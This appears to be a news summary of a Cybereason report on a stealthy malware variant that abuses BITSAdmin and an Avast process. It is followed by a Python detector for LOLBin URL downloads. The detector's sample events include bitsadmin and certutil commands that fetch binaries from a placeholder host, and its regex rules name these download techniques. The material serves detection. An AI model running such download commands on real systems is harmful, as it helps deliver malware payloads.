The latest campaign, discovered by the Cybereason Nocturnus Research team, uses an evolved variant of the malware that goes to great lengths to remain stealthy in what is described as a ‘massive spam campaign’. In a blog report published today, Cybereason has noted four major differences from earlier variants.
Firstly, this variant exclusively uses BITSAdmin (as used in the latest-reported APT10 attacks) to download the payload. Earlier versions used Windows’ certificate management tool, certutil.
Secondly, in a major and effective move, the latest version uses, rather than evades, the Avast anti-malware product. Earlier versions simply stopped if Avast was present; the latest version instead uses an Avast process as a LOLBin (a living-off-the-land binary, a legitimate signed executable repurposed to run attacker code).
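As an added detection-side example (not code from the Cybereason report), the following Python flags process-creation records in which bitsadmin.exe or certutil.exe is used to fetch content from a URL, covering both the current BITSAdmin download and the earlier certutil technique. The sample events are constructed for illustration, and `example.invalid` is a placeholder host, not an indicator from the campaign.

```python
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1 / EDR
# telemetry. These are illustrative only, not telemetry from the campaign.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer upd http://example.invalid/a.bin C:\Users\Public\a.bin"},
    {"parent": "svchost.exe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /list /allusers"},          # benign administrative use
    {"parent": "wscript.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -f http://example.invalid/b.bin b.bin"},
    {"parent": "cmd.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -store My"},                  # benign certificate query
]

# Each rule pairs a LOLBin image name with the command-line shape that indicates
# a download from a URL (both switches are documented Microsoft functionality).
LOLBIN_DOWNLOAD_RULES = {
    "bitsadmin.exe": re.compile(r"/transfer\b.*https?://", re.IGNORECASE),
    "certutil.exe": re.compile(r"-urlcache\b.*https?://", re.IGNORECASE),
}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def classify(event):
    """Return a finding dict if the event is a LOLBin download, else None."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    rule = LOLBIN_DOWNLOAD_RULES.get(image)
    if rule is None or not rule.search(event["cmdline"]):
        return None
    url = URL_RE.search(event["cmdline"])
    return {
        "technique": "lolbin_download",
        "image": image,
        "parent": event["parent"],
        "url": url.group(0) if url else None,
    }


def detect(events):
    """Run every event through the rules and keep only the findings."""
    return [f for f in (classify(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Benign use of the same binaries (listing BITS jobs, querying certificate stores) produces no finding, so the parent process and fetched URL in each finding are what an analyst would triage next.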